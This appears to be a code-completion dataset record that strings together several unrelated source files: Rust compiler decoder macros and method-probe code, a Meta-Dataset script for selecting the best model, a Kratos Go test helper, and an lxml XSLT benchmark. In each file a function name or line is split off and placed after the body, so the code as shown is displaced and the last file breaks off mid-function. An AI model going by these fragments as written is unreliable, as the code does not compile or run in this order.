$attrs:ident)*] [[$name:ident: $ty:ty], $tcx:lifetime]) => { impl<$tcx, D: TyDecoder<$tcx>> RefDecodable<$tcx, D> for $ty { #[inline] fn decode(decoder: &mut D) -> Result<&$tcx Self, D::Error> { decode_arena_allocable(decoder) } } impl<$tcx, D: TyDecoder<$tcx>> RefDecodable<$tcx, D> for [$ty] { #[inline] fn decode(decoder: &mut D) -> Result<&$tcx Self, D::Error> { decode_arena_allocable_slice(decoder) } } }; ([$ignore:ident $(, $attrs:ident)*]$args:tt) => { impl_arena_allocatable_decoder!([$($attrs),*]$args); }; } macro_rules! impl_arena_allocatable_decoders { ([], [$($a:tt $name:ident: $ty:ty,)*], $tcx:lifetime) => { $( impl_arena_allocatable_decoder!($a [[$name: $ty], $tcx]); )* } } rustc_hir::arena_types!(impl_arena_allocatable_decoders, [], 'tcx); arena_types!(impl_arena_allocatable_decoders, [], 'tcx); #[macro_export] macro_rules! implement_ty_decoder { ($DecoderName:ident <$($typaram:tt),*>) => { mod __ty_decoder_impl { use std::borrow::Cow; use rustc_serialize::Decoder; use super::$DecoderName; impl<$($typaram ),*> Decoder for $DecoderName<$($typaram),*> { type Error = String; $crate::__impl_decoder_methods! { read_nil -> (); read_u128 -> u128; read_u64 -> u64; read_u32 -> u32; read_u16 -> u16; read_u8 -> u8; read_usize -> usize; read_i128 -> i128; read_i64 -> i64; read_i32 -> i32; read_i16 -> i16; read_i8 -> i8; read_isize -> isize; read_bool -> bool; read_f64 -> f64; read_f32 -> f32; read_char -> char; read_str -> Cow<'_, str>; } fn error(&mut self, err: &str) -> Self::Error { self.opaque.error(err) } } } } } macro_rules! impl_binder_encode_decode { ($($t:ty),+ $(,)?) => { $( impl<'tcx, E: TyEncoder<'tcx>> Encodable<E> for ty::Binder<$t> { fn encode(&self, e: &mut E) -> Result<(), E::Error> { self.as_ref().skip_binder().encode(e) } } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for ty::Binder<$t> { fn decode(decoder: &mut D) -> Result<Self, D::Error> { Ok(ty::Binder::bind(Decodable::decode(decoder)?)) } } )* } } impl_binder_encode_decode! { &'tcx ty::List<Ty<'tcx>>, ty::FnSig<'tcx>, ty::ExistentialPredicate<'tcx>, ty::TraitRef<'tcx>, Vec<ty::GeneratorInteriorTypeCause<'tcx>>, }
use crate::mir::{
select_best_model.py
# coding=utf-8 # Copyright 2021 The Meta-Dataset Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python2, python3 r"""A script for choosing the best variant of a model automatically. It takes as input the root directory of all experiments, and a list of names of directories in that root, each storing the data of an experiment with multiple variants accross which we want to select the best. Each experiment directory should contain a directoy named 'summaries' that hosts subdirectories for the different runs with each one containing event files. These event files are read to figure out which is best in terms of mean validation accuracy, and at which step of that run this best value occurs in. For each of the experiment directories provided, the output information is saved in a 'best.pklz' file in that directory. This file contains a dict with keys 'best_variant', 'best_valid_acc', and 'best_update_num' where the name of the variant is simply the name of the sub-directory corresponding to that variant. Example directory structure (after the script is ran): Root contains: 'Exp1', 'Exp2'. Exp1 contains: 'checkpoints', 'summaries', and best.pklz summaries contains: '1', '2', '3', ..., '20' '1' contains event files '2' contains event files ... '20' contains event files Sample command: # pylint: disable=line-too-long python -m meta_dataset.analysis.select_best_model \ --alsologtostderr \ --all_experiments_root=<experiments_root> \ --experiment_dir_basenames=baseline_imagenet_icml2019_1/3602170,baselinefinetune_imagenet_icml2019_1/3581340 # pylint: enable=line-too-long """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import json import os from absl import logging import numpy as np from six.moves import range from six.moves import zip import six.moves.cPickle as pkl import tensorflow.compat.v1 as tf FLAGS = tf.flags.FLAGS tf.flags.DEFINE_string( 'all_experiments_root', '', 'The overall experiments directory root.') tf.flags.DEFINE_string( 'experiment_dir_basenames', '' 'baseline_imagenet_icml2019_1/3602170,' 'baselinefinetune_imagenet_icml2019_1/3581340', 'A comma-separated list of directory basenames. Adding each basename as a ' 'suffix to FLAGS.all_experiments_root forms a path that stores the data of ' 'an experiment with multiple variants accross which we want to select the ' 'best. Each such path is expected to host a directory named "summaries" ' 'that contains subdirectories for the different runs with each such ' 'subdirectory containing event files.') # TODO(etriantafillou): This assumes the variants to omit are the same for all # experiments that model selection will be ran for which doesn't make much # sense. Maybe just remove this altogether? tf.flags.DEFINE_string( 'restrict_to_variants', '', 'A comma-separated list of ' 'variants to restrict to for model selection. This is ' 'useful for example for finding the best out of all ' 'variants that use a specific embedding or image size.') tf.flags.DEFINE_string( 'restrict_to_variants_by_range', '', 'A comma-separated list of ' 'two integers that represent the start and end range (both inclusive) ' 'of variant ids to restrict to.') tf.flags.DEFINE_string( 'description', 'best', 'The description for the output. The output will ' 'then be named as description.pklz and description.txt. For example, this ' 'can be used to reflect that some variants were omitted.') # The following two flags assume that the parameters of the experiments have # been logged (they attempt to read from them). If this is not the case, the # restrict_to_variants flag should be used instead. tf.flags.DEFINE_string( 'restrict_to_architectures', '', 'The comma-separated names of the ' 'embedding networks to restrict to for model selection.') tf.flags.DEFINE_enum( 'restrict_to_pretrained_source', '', ['', 'scratch', 'imagenet'], 'The name of a pretrained_source to ' 'restrict to for model selection.') tf.flags.DEFINE_integer( 'smooth_window', 1, 'rolling average window to be ' 'applied before the best model selection. ' 'Set 1 for no smoothing.') VALIDATION_ACCURACY_TAGS = ( 'valid_acc/mean', 'mean valid acc', 'mean acc', # TODO(doersch): rather unclear tag written by trainer.py ) def get_value_from_params_dir(params_dir, param_names): """Gets the first found value from `param_names` in `params_dir`.""" def _load_params(param_name, params_file, loader, mode): with tf.io.gfile.GFile(params_file, mode) as f: params = loader(f) logging.info('Found params file %s', params_file) return params[param_name] for param_name in param_names: try: try: return _load_params(param_name, os.path.join(params_dir, 'params.json'), json.load, 'r') except tf.errors.NotFoundError: logging.info('%s does not exist in %s', 'params.json', params_dir) try: return _load_params(param_name, os.path.join(params_dir, 'params.pkl'), pkl.load, 'rb') except tf.errors.NotFoundError: logging.info('%s does not exist in %s', 'params.pkl', params_dir) except KeyError: pass raise ValueError('Did not find any of the following keys: %s' % param_names) def
(root_dir, restrict_to_architectures, restrict_to_pretrained_source, restrict_to_variants=None): """Returns a dict that maps each variant name to its event file. The name of the variant is the basename of the directory where it's stored. Assumes the following directory organization root_dir contains a sub-directory for every variant where event files can be found. There may be more than one event file for each variant, e.g. a new one will be created upon restarting an experiment that was pre-empted. So later event files contain the summaries for larger values of 'step'. We need all of them for determining the global 'best'. Args: root_dir: A str. The root directory of experiments of all models variants. restrict_to_architectures: A list of names of architectures to restrict to when choosing the best variant. restrict_to_pretrained_source: A string. The pretrained_source to restrict to when choosing the best variant. restrict_to_variants: Optionally, a set of variant names to restrict to. """ params_dir = os.path.join(root_dir, 'params') summary_dir = os.path.join(root_dir, 'summaries') logging.info('Looking for parameters in params_dir: %s', params_dir) logging.info('Looking for summaries in summary_dir: %s', summary_dir) def get_variant_architecture(name): """Return the architecture of the given variant if recorded; o/w None.""" variant_params_dir = os.path.join(params_dir, name) architecture = get_value_from_params_dir( variant_params_dir, ( '_gin.Learner.embedding_fn', # The following are for backwards compatibility. '_gin.Trainer.embedding_network', '_gin.LearnerConfig.embedding_network', )) return architecture def get_variant_pretrained_source(name): """Return the pretrained src of the given variant if recorded; o/w None.""" variant_params_dir = os.path.join(params_dir, name) pretrained_source = get_value_from_params_dir( variant_params_dir, '_gin.Trainer.pretrained_source') if not pretrained_source: # Backwards compatibility. pretrained_source = get_value_from_params_dir( variant_params_dir, '_gin.LearnerConfig.pretrained_source') return pretrained_source def keep_variant(name): """Determine if the variant in directory name should be considered.""" value_error_msg = ( 'Requested to restrict to an architecture or ' 'pretrained_source but the given experiment does not ' 'have its params recorded. Looked in: {}'.format(params_dir)) if restrict_to_architectures: architecture = get_variant_architecture(name) if architecture is None: raise ValueError(value_error_msg) valid_architecture = (not restrict_to_architectures or architecture in restrict_to_architectures) if restrict_to_pretrained_source: pretrained_source = get_variant_pretrained_source(name) if pretrained_source is None: raise ValueError(value_error_msg) valid_pretrained_source = ( not restrict_to_pretrained_source or pretrained_source == restrict_to_pretrained_source) valid_variant_name = True if restrict_to_variants is not None: valid_variant_name = name in restrict_to_variants return (valid_architecture and valid_pretrained_source and valid_variant_name) variant_names = [ fname for fname in tf.io.gfile.listdir(summary_dir) if tf.io.gfile.isdir(os.path.join(summary_dir, fname)) ] if not variant_names: # Maybe there are no variants, and we are already in the directory that # contains the summaries. In this case, we consider that the current # directory (.) is the only variant. variant_names = ['.'] # Further filter variant names based on the given restrictions. variant_names = [name for name in variant_names if keep_variant(name)] if not variant_names: raise ValueError('Found no subdirectories in {}. Was expecting a ' 'subdirectory per variant.'.format(summary_dir)) variant_paths = [ os.path.join(summary_dir, variant_dir) for variant_dir in variant_names ] event_paths = {} for variant_path, variant_name in zip(variant_paths, variant_names): event_filenames = [ f_name for f_name in tf.io.gfile.listdir(variant_path) if f_name.startswith('events.out.tfevents') ] if len(event_filenames) < 1: logging.warn('Skipping empty variant %s.', variant_path) logging.info( 'Was expecting at least one event file ' 'in directory %s. Instead, found %d.', variant_path, len(event_filenames)) continue event_paths[variant_name] = [ os.path.join(variant_path, event_filename) for event_filename in event_filenames ] logging.info('Found event files for variants: %s', list(event_paths.keys())) return event_paths # TODO(crisnv): add smooth_type='uniform' that defines the smooth policy def moving_average(x, smooth_window): """Returns a smoothed version of x. This smoothes the x array according to the smooth_window parameter. Args: x: The array to smooth. smooth_window: An integer that defines the neighborhood to be used in smoothing. """ conv_filter = getattr(moving_average, 'conv_filter', None) if conv_filter is None or (moving_average.conv_filter_size != smooth_window): moving_average.conv_filter = np.ones((smooth_window,)) / smooth_window moving_average.conv_filter_size = smooth_window # if smooth_window is even, pad accordingly to keep stream size x = np.pad(x, (smooth_window // 2, smooth_window - 1 - (smooth_window // 2)), 'reflect') return np.convolve(x, moving_average.conv_filter, mode='valid') def extract_best_from_event_file(event_path, smooth_window, log_details=False): """Returns the best accuracy and the step it occurs in in the given events. This searches the summaries written in a given event file, which may be only a subset of the total summaries of a run, since the summaries of a run are sometimes split into multiple event files. Args: event_path: A string. The path to an event file. smooth_window: An integer that defines the neighborhood to be used in smoothing before the argmax (use <=1 for no smoothing) log_details: A boolean. Whether to log details regarding skipped event paths in which locating the validation accuracy tag failed. """ steps, valid_accs = [], [] try: for event in tf.train.summary_iterator(event_path): step = event.step for value in event.summary.value: if any( valid_tag in value.tag for valid_tag in VALIDATION_ACCURACY_TAGS): steps.append(step) valid_accs.append(value.simple_value) except tf.errors.DataLossError: if log_details: tf.logging.info( 'Omitting events from event_path {} because ' 'tf.train.summary_iterator(event_path) failed.'.format(event_path)) return 0, 0 if not valid_accs: # Could happen if there is no DataLossError above but for some reason # there is no validation accuracy tag found in the summary values. tf.logging.info( 'Did not find any validation accuracy tags ({}) in event_path {}' .format(' or '.join(VALIDATION_ACCURACY_TAGS), event_path)) return 0, 0 if smooth_window > 1: valid_accs = moving_average(valid_accs, smooth_window) argmax_ind = np.argmax(valid_accs) best_acc = valid_accs[argmax_ind] best_step = steps[argmax_ind] if log_details: tf.logging.info('Successfully read event_path {} with best_acc {}'.format( event_path, best_acc)) return best_acc, best_step def extract_best_from_variant(event_paths, smooth_window): """Returns the best accuracy and the step it occurs in for the given run. Args: event_paths: A list of strings. The event files of the given run. smooth_window: An integer that defines the neighborhood to be used in smoothing before the argmax (use <=1 for no smoothing) Raises: RuntimeError: No 'valid' event file for the given variant ('valid' here refers to an event file that has a validation accuracy tag). """ best_step = best_acc = -1 for event_path in event_paths: best_acc_, best_step_ = extract_best_from_event_file( event_path, smooth_window) if best_acc_ > best_acc: best_acc = best_acc_ best_step = best_step_ if best_acc <= 0: raise RuntimeError('Something went wrong with the summary event reading.') return best_acc, best_step def main(argv): del argv experiment_paths = [ os.path.join(FLAGS.all_experiments_root, basename) for basename in FLAGS.experiment_dir_basenames.split(',') ] # Perform model selection for each provided experiment root. for root_experiment_dir in experiment_paths: stars_string = '\n**************************************\n' architecture_string = '' if FLAGS.restrict_to_architectures: architecture_string = ' out of the {} variants'.format( FLAGS.restrict_to_architectures) logging.info('%sSelecting the best variant for: %s%s.%s', stars_string, root_experiment_dir, architecture_string, stars_string) if FLAGS.restrict_to_variants_by_range and FLAGS.restrict_to_variants: raise ValueError('Please provide only one of ' 'FLAGS.restrict_to_variants_by_range and ' 'FLAGS.restrict_to_variants, not both.') restrict_to_variants = None if FLAGS.restrict_to_variants_by_range: start, end = FLAGS.restrict_to_variants_by_range.split(',') start, end = int(start), int(end) restrict_to_variants = set( [str(variant_id) for variant_id in range(start, end + 1)]) if FLAGS.restrict_to_variants: restrict_to_variants = set(FLAGS.restrict_to_variants.split(',')) restrict_to_architectures = [] if FLAGS.restrict_to_architectures: restrict_to_architectures = FLAGS.restrict_to_architectures.split(',') smooth_window = FLAGS.smooth_window event_paths = get_paths_to_events( root_experiment_dir, restrict_to_architectures, FLAGS.restrict_to_pretrained_source, restrict_to_variants=restrict_to_variants) # Read the event file of each variant to find the highest mean validation # accuracy reached with it. best_variant = '' best_valid_acc = -1 best_step = -1 for variant_name, event_path in event_paths.items(): best_valid_acc_, best_step_ = extract_best_from_variant( event_path, smooth_window) if best_valid_acc_ > best_valid_acc: best_variant = variant_name best_valid_acc = best_valid_acc_ best_step = best_step_ output_dict = { 'best_variant': best_variant, 'best_valid_acc': best_valid_acc, 'best_update_num': best_step } # Create a more informative description if necessary. description = FLAGS.description if FLAGS.restrict_to_architectures and FLAGS.description == 'best': description += '_{}'.format(FLAGS.restrict_to_architectures) if (FLAGS.restrict_to_pretrained_source and FLAGS.description == 'best'): if FLAGS.restrict_to_pretrained_source == 'scratch': description += '_trained_from_scratch' else: description += '_pretrained_on_{}'.format( FLAGS.restrict_to_pretrained_source) if FLAGS.smooth_window > 1: description += '_smoothed_by_window_{}'.format(smooth_window) output_path_pklz = os.path.join(root_experiment_dir, '{}.pklz'.format(description)) with tf.io.gfile.GFile(output_path_pklz, 'wb') as f: pkl.dump(output_dict, f, protocol=pkl.HIGHEST_PROTOCOL) # Also write this info as a .txt file for easier reading. output_path_txt = os.path.join(root_experiment_dir, '{}.txt'.format(description)) with tf.io.gfile.GFile(output_path_txt, 'w') as f: f.write( 'best_variant: {}\nbest_valid_acc: {}\nbest_update_num: {}\n'.format( best_variant, best_valid_acc, best_step)) logging.info( 'Best variant: %s. Best valid acc: %s. Best update num: %d. ' 'Just wrote this info to %s and %s', best_variant, best_valid_acc, best_step, output_path_pklz, output_path_txt) if __name__ == '__main__': logging.set_verbosity(logging.INFO) tf.app.run(main)
get_paths_to_events
strategies.go
package testhelpers import ( "fmt" "testing" "github.com/ory/kratos/driver/config" ) func
(t *testing.T, c *config.Provider, strategy string, enable bool) { c.MustSet(fmt.Sprintf("%s.%s.enabled", config.ViperKeySelfServiceStrategyConfig, strategy), enable) }
StrategyEnable
bench_xslt.py
import sys, copy from itertools import * from StringIO import StringIO import benchbase from benchbase import with_attributes, with_text, onlylib, serialized ############################################################ # Benchmarks ############################################################ class XSLTBenchMark(benchbase.TreeBenchMark): @onlylib('lxe') def bench_xslt_extensions_old(self, root): tree = self.etree.XML("""\ <xsl:stylesheet version="1.0" xmlns:l="test" xmlns:testns="testns" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <l:data>TEST</l:data> <xsl:template match="/"> <l:result> <xsl:for-each select="*/*"> <xsl:copy-of select="testns:child(.)"/> </xsl:for-each> </l:result> </xsl:template> </xsl:stylesheet> """) def return_child(_, elements):
extensions = {('testns', 'child') : return_child} transform = self.etree.XSLT(tree, extensions) for i in range(10): transform(root) @onlylib('lxe') def bench_xslt_document(self, root): transform = self.etree.XSLT(self.etree.XML("""\ <xsl:stylesheet version="1.0" xmlns:l="test" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <l:data>TEST</l:data> <xsl:template match="/"> <l:result> <xsl:for-each select="*/*"> <l:test><xsl:copy-of select="document('')//l:data/text()"/></l:test> </xsl:for-each> </l:result> </xsl:template> </xsl:stylesheet> """)) transform(root) if __name__ == '__main__': benchbase.main(XSLTBenchMark)
return elements[0][0]
probe.rs
use super::MethodError; use super::NoMatchData; use super::{CandidateSource, ImplSource, TraitSource}; use super::suggest; use crate::check::autoderef::{self, Autoderef}; use crate::check::FnCtxt; use crate::hir::def_id::DefId; use crate::hir::def::DefKind; use crate::namespace::Namespace; use rustc_data_structures::sync::Lrc; use rustc::hir; use rustc::lint; use rustc::session::config::nightly_options; use rustc::ty::subst::{Subst, InternalSubsts, SubstsRef}; use rustc::traits::{self, ObligationCause}; use rustc::traits::query::{CanonicalTyGoal}; use rustc::traits::query::method_autoderef::{CandidateStep, MethodAutoderefStepsResult}; use rustc::traits::query::method_autoderef::{MethodAutoderefBadTy}; use rustc::ty::{self, ParamEnvAnd, Ty, TyCtxt, ToPolyTraitRef, ToPredicate, TraitRef, TypeFoldable}; use rustc::ty::GenericParamDefKind; use rustc::infer::type_variable::{TypeVariableOrigin, TypeVariableOriginKind}; use rustc::infer::unify_key::{ConstVariableOrigin, ConstVariableOriginKind}; use rustc::util::nodemap::FxHashSet; use rustc::infer::{self, InferOk}; use rustc::infer::canonical::{Canonical, QueryResponse}; use rustc::infer::canonical::{OriginalQueryValues}; use rustc::middle::stability; use syntax::ast; use syntax::util::lev_distance::{lev_distance, find_best_match_for_name}; use syntax_pos::{DUMMY_SP, Span, symbol::Symbol}; use std::iter; use std::mem; use std::ops::Deref; use std::cmp::max; use rustc_error_codes::*; use smallvec::{smallvec, SmallVec}; use self::CandidateKind::*; pub use self::PickKind::*; /// Boolean flag used to indicate if this search is for a suggestion /// or not. If true, we can allow ambiguity and so forth. #[derive(Clone, Copy)] pub struct IsSuggestion(pub bool); struct ProbeContext<'a, 'tcx> { fcx: &'a FnCtxt<'a, 'tcx>, span: Span, mode: Mode, method_name: Option<ast::Ident>, return_type: Option<Ty<'tcx>>, /// This is the OriginalQueryValues for the steps queries /// that are answered in steps. orig_steps_var_values: OriginalQueryValues<'tcx>, steps: Lrc<Vec<CandidateStep<'tcx>>>, inherent_candidates: Vec<Candidate<'tcx>>, extension_candidates: Vec<Candidate<'tcx>>, impl_dups: FxHashSet<DefId>, /// Collects near misses when the candidate functions are missing a `self` keyword and is only /// used for error reporting static_candidates: Vec<CandidateSource>, /// When probing for names, include names that are close to the /// requested name (by Levensthein distance) allow_similar_names: bool, /// Some(candidate) if there is a private candidate private_candidate: Option<(DefKind, DefId)>, /// Collects near misses when trait bounds for type parameters are unsatisfied and is only used /// for error reporting unsatisfied_predicates: Vec<TraitRef<'tcx>>, is_suggestion: IsSuggestion, } impl<'a, 'tcx> Deref for ProbeContext<'a, 'tcx> { type Target = FnCtxt<'a, 'tcx>; fn deref(&self) -> &Self::Target { &self.fcx } } #[derive(Debug)] struct Candidate<'tcx> { // Candidates are (I'm not quite sure, but they are mostly) basically // some metadata on top of a `ty::AssocItem` (without substs). // // However, method probing wants to be able to evaluate the predicates // for a function with the substs applied - for example, if a function // has `where Self: Sized`, we don't want to consider it unless `Self` // is actually `Sized`, and similarly, return-type suggestions want // to consider the "actual" return type. // // The way this is handled is through `xform_self_ty`. It contains // the receiver type of this candidate, but `xform_self_ty`, // `xform_ret_ty` and `kind` (which contains the predicates) have the // generic parameters of this candidate substituted with the *same set* // of inference variables, which acts as some weird sort of "query". // // When we check out a candidate, we require `xform_self_ty` to be // a subtype of the passed-in self-type, and this equates the type // variables in the rest of the fields. // // For example, if we have this candidate: // ``` // trait Foo { // fn foo(&self) where Self: Sized; // } // ``` // // Then `xform_self_ty` will be `&'erased ?X` and `kind` will contain // the predicate `?X: Sized`, so if we are evaluating `Foo` for a // the receiver `&T`, we'll do the subtyping which will make `?X` // get the right value, then when we evaluate the predicate we'll check // if `T: Sized`. xform_self_ty: Ty<'tcx>, xform_ret_ty: Option<Ty<'tcx>>, item: ty::AssocItem, kind: CandidateKind<'tcx>, import_ids: SmallVec<[hir::HirId; 1]>, } #[derive(Debug)] enum CandidateKind<'tcx> { InherentImplCandidate(SubstsRef<'tcx>, // Normalize obligations Vec<traits::PredicateObligation<'tcx>>), ObjectCandidate, TraitCandidate(ty::TraitRef<'tcx>), WhereClauseCandidate(// Trait ty::PolyTraitRef<'tcx>), } #[derive(Debug, PartialEq, Eq, Copy, Clone)] enum ProbeResult { NoMatch, BadReturnType, Match, } #[derive(Debug, PartialEq, Clone)] pub struct Pick<'tcx> { pub item: ty::AssocItem, pub kind: PickKind<'tcx>, pub import_ids: SmallVec<[hir::HirId; 1]>, // Indicates that the source expression should be autoderef'd N times // // A = expr | *expr | **expr | ... pub autoderefs: usize, // Indicates that an autoref is applied after the optional autoderefs // // B = A | &A | &mut A pub autoref: Option<hir::Mutability>, // Indicates that the source expression should be "unsized" to a // target type. This should probably eventually go away in favor // of just coercing method receivers. // // C = B | unsize(B) pub unsize: Option<Ty<'tcx>>, } #[derive(Clone, Debug, PartialEq, Eq)] pub enum PickKind<'tcx> { InherentImplPick, ObjectPick, TraitPick, WhereClausePick(// Trait ty::PolyTraitRef<'tcx>), } pub type PickResult<'tcx> = Result<Pick<'tcx>, MethodError<'tcx>>; #[derive(PartialEq, Eq, Copy, Clone, Debug)] pub enum Mode { // An expression of the form `receiver.method_name(...)`. // Autoderefs are performed on `receiver`, lookup is done based on the // `self` argument of the method, and static methods aren't considered. MethodCall, // An expression of the form `Type::item` or `<T>::item`. // No autoderefs are performed, lookup is done based on the type each // implementation is for, and static methods are included. Path, } #[derive(PartialEq, Eq, Copy, Clone, Debug)] pub enum ProbeScope { // Assemble candidates coming only from traits in scope. TraitsInScope, // Assemble candidates coming from all traits. AllTraits, } impl<'a, 'tcx> FnCtxt<'a, 'tcx> { /// This is used to offer suggestions to users. It returns methods /// that could have been called which have the desired return /// type. Some effort is made to rule out methods that, if called, /// would result in an error (basically, the same criteria we /// would use to decide if a method is a plausible fit for /// ambiguity purposes). pub fn probe_for_return_type(&self, span: Span, mode: Mode, return_type: Ty<'tcx>, self_ty: Ty<'tcx>, scope_expr_id: hir::HirId) -> Vec<ty::AssocItem> { debug!("probe(self_ty={:?}, return_type={}, scope_expr_id={})", self_ty, return_type, scope_expr_id); let method_names = self.probe_op(span, mode, None, Some(return_type), IsSuggestion(true), self_ty, scope_expr_id, ProbeScope::AllTraits, |probe_cx| Ok(probe_cx.candidate_method_names())) .unwrap_or(vec![]); method_names .iter() .flat_map(|&method_name| { self.probe_op( span, mode, Some(method_name), Some(return_type), IsSuggestion(true), self_ty, scope_expr_id, ProbeScope::AllTraits, |probe_cx| probe_cx.pick() ).ok().map(|pick| pick.item) }) .collect() } pub fn probe_for_name(&self, span: Span, mode: Mode, item_name: ast::Ident, is_suggestion: IsSuggestion, self_ty: Ty<'tcx>, scope_expr_id: hir::HirId, scope: ProbeScope) -> PickResult<'tcx> { debug!("probe(self_ty={:?}, item_name={}, scope_expr_id={})", self_ty, item_name, scope_expr_id); self.probe_op(span, mode, Some(item_name), None, is_suggestion, self_ty, scope_expr_id, scope, |probe_cx| probe_cx.pick()) } fn probe_op<OP, R>( &'a self, span: Span, mode: Mode, method_name: Option<ast::Ident>, return_type: Option<Ty<'tcx>>, is_suggestion: IsSuggestion, self_ty: Ty<'tcx>, scope_expr_id: hir::HirId, scope: ProbeScope, op: OP, ) -> Result<R, MethodError<'tcx>> where OP: FnOnce(ProbeContext<'a, 'tcx>) -> Result<R, MethodError<'tcx>>, { let mut orig_values = OriginalQueryValues::default(); let param_env_and_self_ty = self.infcx.canonicalize_query( &ParamEnvAnd { param_env: self.param_env, value: self_ty }, &mut orig_values); let steps = if mode == Mode::MethodCall { self.tcx.method_autoderef_steps(param_env_and_self_ty) } else { self.infcx.probe(|_| { // Mode::Path - the deref steps is "trivial". This turns // our CanonicalQuery into a "trivial" QueryResponse. This // is a bit inefficient, but I don't think that writing // special handling for this "trivial case" is a good idea. let infcx = &self.infcx; let (ParamEnvAnd { param_env: _, value: self_ty }, canonical_inference_vars) = infcx.instantiate_canonical_with_fresh_inference_vars( span, &param_env_and_self_ty); debug!("probe_op: Mode::Path, param_env_and_self_ty={:?} self_ty={:?}", param_env_and_self_ty, self_ty); MethodAutoderefStepsResult { steps: Lrc::new(vec![CandidateStep { self_ty: self.make_query_response_ignoring_pending_obligations( canonical_inference_vars, self_ty), autoderefs: 0, from_unsafe_deref: false, unsize: false, }]), opt_bad_ty: None, reached_recursion_limit: false } }) }; // If our autoderef loop had reached the recursion limit, // report an overflow error, but continue going on with // the truncated autoderef list. if steps.reached_recursion_limit { self.probe(|_| { let ty = &steps.steps.last().unwrap_or_else(|| { span_bug!(span, "reached the recursion limit in 0 steps?") }).self_ty; let ty = self.probe_instantiate_query_response(span, &orig_values, ty) .unwrap_or_else(|_| span_bug!(span, "instantiating {:?} failed?", ty)); autoderef::report_autoderef_recursion_limit_error(self.tcx, span, ty.value); }); } // If we encountered an `_` type or an error type during autoderef, this is // ambiguous. if let Some(bad_ty) = &steps.opt_bad_ty { if is_suggestion.0 { // Ambiguity was encountered during a suggestion. Just keep going. debug!("ProbeContext: encountered ambiguity in suggestion"); } else if bad_ty.reached_raw_pointer && !self.tcx.features().arbitrary_self_types { // this case used to be allowed by the compiler, // so we do a future-compat lint here for the 2015 edition // (see https://github.com/rust-lang/rust/issues/46906) if self.tcx.sess.rust_2018() { span_err!(self.tcx.sess, span, E0699, "the type of this value must be known \ to call a method on a raw pointer on it"); } else { self.tcx.lint_hir( lint::builtin::TYVAR_BEHIND_RAW_POINTER, scope_expr_id, span, "type annotations needed"); } } else { // Encountered a real ambiguity, so abort the lookup. If `ty` is not // an `Err`, report the right "type annotations needed" error pointing // to it. let ty = &bad_ty.ty; let ty = self.probe_instantiate_query_response(span, &orig_values, ty) .unwrap_or_else(|_| span_bug!(span, "instantiating {:?} failed?", ty)); let ty = self.structurally_resolved_type(span, ty.value); assert_eq!(ty, self.tcx.types.err); return Err(MethodError::NoMatch(NoMatchData::new(Vec::new(), Vec::new(), Vec::new(), None, mode))); } } debug!("ProbeContext: steps for self_ty={:?} are {:?}", self_ty, steps); // this creates one big transaction so that all type variables etc // that we create during the probe process are removed later self.probe(|_| { let mut probe_cx = ProbeContext::new( self, span, mode, method_name, return_type, orig_values, steps.steps, is_suggestion, ); probe_cx.assemble_inherent_candidates(); match scope { ProbeScope::TraitsInScope => probe_cx.assemble_extension_candidates_for_traits_in_scope(scope_expr_id)?, ProbeScope::AllTraits => probe_cx.assemble_extension_candidates_for_all_traits()?, }; op(probe_cx) }) } } pub fn provide(providers: &mut ty::query::Providers<'_>) { providers.method_autoderef_steps = method_autoderef_steps; } fn method_autoderef_steps<'tcx>( tcx: TyCtxt<'tcx>, goal: CanonicalTyGoal<'tcx>, ) -> MethodAutoderefStepsResult<'tcx> { debug!("method_autoderef_steps({:?})", goal); tcx.infer_ctxt().enter_with_canonical(DUMMY_SP, &goal, |ref infcx, goal, inference_vars| { let ParamEnvAnd { param_env, value: self_ty } = goal; let mut autoderef = Autoderef::new(infcx, param_env, hir::DUMMY_HIR_ID, DUMMY_SP, self_ty) .include_raw_pointers() .silence_errors(); let mut reached_raw_pointer = false; let mut steps: Vec<_> = autoderef.by_ref() .map(|(ty, d)| { let step = CandidateStep { self_ty: infcx.make_query_response_ignoring_pending_obligations( inference_vars.clone(), ty), autoderefs: d, from_unsafe_deref: reached_raw_pointer, unsize: false, }; if let ty::RawPtr(_) = ty.kind { // all the subsequent steps will be from_unsafe_deref reached_raw_pointer = true; } step }) .collect(); let final_ty = autoderef.maybe_ambiguous_final_ty(); let opt_bad_ty = match final_ty.kind { ty::Infer(ty::TyVar(_)) | ty::Error => { Some(MethodAutoderefBadTy { reached_raw_pointer, ty: infcx.make_query_response_ignoring_pending_obligations( inference_vars, final_ty) }) } ty::Array(elem_ty, _) => { let dereferences = steps.len() - 1; steps.push(CandidateStep { self_ty: infcx.make_query_response_ignoring_pending_obligations( inference_vars, infcx.tcx.mk_slice(elem_ty)), autoderefs: dereferences, // this could be from an unsafe deref if we had // a *mut/const [T; N] from_unsafe_deref: reached_raw_pointer, unsize: true, }); None } _ => None }; debug!("method_autoderef_steps: steps={:?} opt_bad_ty={:?}", steps, opt_bad_ty); MethodAutoderefStepsResult { steps: Lrc::new(steps), opt_bad_ty: opt_bad_ty.map(Lrc::new), reached_recursion_limit: autoderef.reached_recursion_limit() } }) } impl<'a, 'tcx> ProbeContext<'a, 'tcx> { fn new( fcx: &'a FnCtxt<'a, 'tcx>, span: Span, mode: Mode, method_name: Option<ast::Ident>, return_type: Option<Ty<'tcx>>, orig_steps_var_values: OriginalQueryValues<'tcx>, steps: Lrc<Vec<CandidateStep<'tcx>>>, is_suggestion: IsSuggestion, ) -> ProbeContext<'a, 'tcx> { ProbeContext { fcx, span, mode, method_name, return_type, inherent_candidates: Vec::new(), extension_candidates: Vec::new(), impl_dups: FxHashSet::default(), orig_steps_var_values, steps, static_candidates: Vec::new(), allow_similar_names: false, private_candidate: None, unsatisfied_predicates: Vec::new(), is_suggestion, } } fn reset(&mut self) { self.inherent_candidates.clear(); self.extension_candidates.clear(); self.impl_dups.clear(); self.static_candidates.clear(); self.private_candidate = None; } /////////////////////////////////////////////////////////////////////////// // CANDIDATE ASSEMBLY fn push_candidate(&mut self, candidate: Candidate<'tcx>, is_inherent: bool) { let is_accessible = if let Some(name) = self.method_name { let item = candidate.item; let def_scope = 